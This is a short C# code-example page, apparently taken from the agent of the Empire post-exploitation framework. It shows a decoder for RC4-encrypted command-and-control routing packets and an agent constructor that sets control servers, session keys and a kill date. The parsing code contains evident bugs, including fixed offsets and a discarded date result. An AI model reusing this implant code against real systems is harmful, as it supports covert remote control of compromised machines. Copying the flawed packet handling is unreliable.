Exemple #1
0
        ////////////////////////////////////////////////////////////////////////////////
        internal void decodeRoutingPacket(byte[] packetData, ref JobTracking jobTracking)
        {
            this.jobTracking = jobTracking;

            if (packetData.Length < 20)
            {
                return;
            }
            Int32 offset = 0;

            while (offset < packetData.Length)
            {
                byte[] routingPacket = packetData.Skip(offset).Take(20).ToArray();
                byte[] routingInitializationVector = routingPacket.Take(4).ToArray();
                byte[] routingEncryptedData        = packetData.Skip(4).Take(16).ToArray();
                offset += 20;

                byte[] rc4Key = Misc.combine(routingInitializationVector, stagingKeyBytes);

                byte[] routingData     = EmpireStager.rc4Encrypt(rc4Key, routingEncryptedData);
                String packetSessionId = Encoding.UTF8.GetString(routingData.Take(8).ToArray());
                try
                {
                    byte language = routingPacket[8];
                    byte metaData = routingPacket[9];
                }
                catch (IndexOutOfRangeException error)
                {
                    WriteOutputBad(error.ToString());
                }
                byte[] extra        = routingPacket.Skip(10).Take(2).ToArray();
                UInt32 packetLength = BitConverter.ToUInt32(routingData, 12);

                if (packetLength < 0)
                {
                    break;
                }

                if (sessionId == packetSessionId)
                {
                    byte[] encryptedData = packetData.Skip(offset).Take(offset + (Int32)packetLength - 1).ToArray();
                    offset += (Int32)packetLength;
                    try
                    {
                        processTaskingPackets(encryptedData);
                    }
                    catch (Exception error)
                    {
                        WriteOutputBad(error.ToString());
                    }
                }
            }
        }
        ////////////////////////////////////////////////////////////////////////////////
        public Agent(String stagingKey, String sessionKey, String sessionId, String servers)
        {
            this.sessionId  = sessionId;
            defaultResponse = "";

            killDate = DateTime.Now;
            killDate.AddYears(1);

            controlServers = servers.Split(',');

            coms        = new Coms(sessionId, stagingKey, sessionKey, controlServers);
            jobTracking = new JobTracking();
        }